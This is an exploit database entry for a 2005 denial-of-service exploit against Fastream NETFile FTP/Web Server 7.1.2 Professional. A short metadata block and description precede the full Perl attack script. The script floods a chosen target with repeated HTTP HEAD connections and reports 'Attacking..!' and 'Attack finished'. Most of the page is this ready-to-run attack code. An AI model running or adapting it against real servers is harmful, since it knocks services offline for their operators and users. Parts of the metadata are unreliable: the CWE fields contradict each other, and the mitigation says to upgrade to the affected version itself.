Fastream NETFile FTP/Web Server 7.1.2 Professional DoS Exploit

vendor:

NETFile FTP/Web Server

by:

bratax ck and karak0rsan

7.5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: NETFile FTP/Web Server

Affected Version From: 7.1.2 Professional

Affected Version To: 7.1.2 Professional

Patch Exists: Yes

Related CWE: N/A

CPE: a:fastream:netfile_ftp_web_server:7.1.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

Fastream NETFile FTP/Web Server 7.1.2 Professional DoS Exploit

A denial of service vulnerability exists in Fastream NETFile FTP/Web Server 7.1.2 Professional. An attacker can send a specially crafted HTTP request to the server to cause a denial of service condition. This exploit was coded by karak0rsan and the bug was found by bratax ck.

Mitigation:

Upgrade to the latest version of Fastream NETFile FTP/Web Server 7.1.2 Professional.

Source

Exploit-DB raw data:

#Fastream NETFile FTP/Web Server 7.1.2 Professional DoS Exploit
#Bug found by bratax ck
#Coded bY karak0rsan
#d0gma.org // unuver.com
#Greetz:hurby,phalaposher,l4m3r,Atak,spymaster,razor...

$host=$ARGV[0];
$port=$ARGV[1];

if(!$ARGV[1]){
       print "Fastream FTP/Web Server DoS\n";
       print "Coded by karak0rsan // unuver.com\n";
       print "Usage:perl $0 [target] [port]\n";
}

use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Couldn't Connect!\n";;
close($socket);
if($socket){
       print "\n";
       print "[+]Attacking..!\n";
       }

for($i= 0; $i < 100; $i++)
{
$socket1 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
print $socket1 "HEAD / HTTP/1.0\r\n\r\n";
close($socket1);
}
print "Attack finished ;)\n";
exit();

#EoF

# milw0rm.com [2005-09-16]